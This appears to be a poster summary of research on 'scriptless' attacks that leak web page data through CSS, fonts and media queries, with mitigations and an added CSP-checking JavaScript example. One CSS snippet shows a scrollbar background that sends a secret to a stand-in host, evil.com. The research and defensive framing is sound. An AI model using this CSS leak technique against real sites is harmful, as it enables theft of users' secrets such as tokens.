SCRIPTLESS ATTACKS: STEALING THE PIE WITHOUT TOUCHING THE SILL
BACKGROUND
• XSS recently replaced SQL injection and related server-side injection attacks as the number one threat in the OWASP (Open Web Application Security Project) ranking.
• As popular applications like Skype, Outlook, Thunderbird and Windows 8 use HTML, users are turning to security extensions like NoScript.
• Given all these defense strategies, we expect that attackers will strive towards developing “Scriptless Attacks”, which achieve the same goal as XSS attacks without using any scripting.
BEYOND SCRIPT-BASED ATTACKS
• Assumptions:
• The attacker can inject arbitrary data into the DOM rendered by the browser
• We assume that scripting is completely disabled
• The following browser features are useful building blocks in constructing attacks
- Web fonts based on SVG and WOFF
• Attackers employ these fonts and utilize their features to vary the properties of displayed website content.
ATTACK COMPONENTS
• CSS-based Animations
• With CSS-based animations, it is possible to change a wide range of CSS and DOM properties over time without using any script code
• The CSS Content Property
• CSS provides a property called content that can extract arbitrary attribute values and display the value either before, after, or instead of the selected element
/* show each link's href attribute value after the link */
a[href^="http://"]:after{content:attr(href)}
• CSS Media Queries
<style type="text/css">
/* the rendered text and colour depend on the view-port width */
@media screen and (min-width: 401px) {
  * { background: green; }
  body:after { content: 'larger view-port'; }
}
@media screen and (max-width: 400px) {
  * { background: red; }
  body:after { content: 'smaller view-port'; }
}
</style>
MEASUREMENT-BASED CONTENT EXFILTRATION - USING SMART SCROLLBARS
• To enable a purely CSS-based data exfiltration attack, we utilize all of the available features listed in the section above.
<div id="s">secret</div>
<style type="text/css">
/* the background URL is attached to a scrollbar state of the element holding the secret */
div#s::-webkit-scrollbar-track-piece:vertical:increment {
  background: red url(//evil.com?s);
}
</style>
• To mitigate this attack,
• it is recommended to treat scrollbar backgrounds and scrollbar state backgrounds equally;
• all background images and similar external resources should be loaded during page-load and not on appearance or state occurrence.
MITIGATION TECHNIQUES
• We conclude that several layers of protection are necessary to effectively and holistically defend against CSS-, SVG- and HTML-based data leakage
1. Content Security Policy (CSP)
2. Detecting Detached Views
3. Miscellaneous Defense Techniques
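How the first layer relates to the scrollbar leak shown earlier, as an added example that is not part of the original slides: a simplified CSP source matcher that checks whether a policy lets the page fetch the `//evil.com?s` background image. `PAGE`, `WEAK`, `HARDENED` and all function names are constructed for illustration, and the matcher ignores ports, paths and the scheme rules for scheme-less host sources.

```javascript
// Added example: simplified CSP source matching (not a full CSP Level 3 implementation).
// Constructed values: PAGE, WEAK and HARDENED; //evil.com?s is the URL from the slide.
const PAGE = 'https://app.example/inbox';
const WEAK = "script-src 'none'";                                  // only scripting is blocked
const HARDENED = "default-src 'none'; img-src 'self'; font-src 'self'; style-src 'self'";

// CSS background images are governed by img-src, web fonts by font-src.
const DIRECTIVE_FOR = { image: 'img-src', font: 'font-src' };

function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    // The first occurrence of a directive wins; later duplicates are ignored.
    if (name && !policy.has(name.toLowerCase())) policy.set(name.toLowerCase(), sources);
  }
  return policy;
}

function sourceMatches(source, url, pageOrigin) {
  const s = source.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return url.origin === pageOrigin;
  if (s === '*') return /^(https?|wss?):$/.test(url.protocol);
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return url.protocol === s;  // scheme-source, e.g. https:
  // host-source: optional scheme, optional leading "*."; ports and paths are not handled here.
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([a-z0-9.-]+)$/.exec(s);
  if (!m) return false;
  if (m[1] && url.protocol !== m[1] + ':') return false;
  return m[2] ? url.hostname.endsWith('.' + m[3]) : url.hostname === m[3];
}

// True if the policy lets the page fetch rawUrl as the given resource type.
function cspAllows(header, type, rawUrl, pageUrl = PAGE) {
  const policy = parseCsp(header);
  const sources = policy.get(DIRECTIVE_FOR[type]) ?? policy.get('default-src');
  if (sources === undefined) return true;          // no governing directive: nothing is blocked
  const url = new URL(rawUrl, pageUrl);            // resolves protocol-relative //evil.com?s
  const pageOrigin = new URL(pageUrl).origin;
  return sources.some((src) => sourceMatches(src, url, pageOrigin));
}

console.log('weak policy, scrollbar background:', cspAllows(WEAK, 'image', '//evil.com?s'));
console.log('hardened policy, scrollbar background:', cspAllows(HARDENED, 'image', '//evil.com?s'));
console.log('hardened policy, same-origin image:', cspAllows(HARDENED, 'image', '/img/logo.png'));
```

A policy that only disables scripts leaves the image and font channels open, which is why the restrictive `default-src` with explicit `img-src` and `font-src` entries matters here.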
CONCLUSION
While the attacks discussed in this paper presumably do not represent the entirety of ways to illegitimately retrieve sensitive user-data, we believe that the attack components discussed in this paper are of great importance to other attack vectors.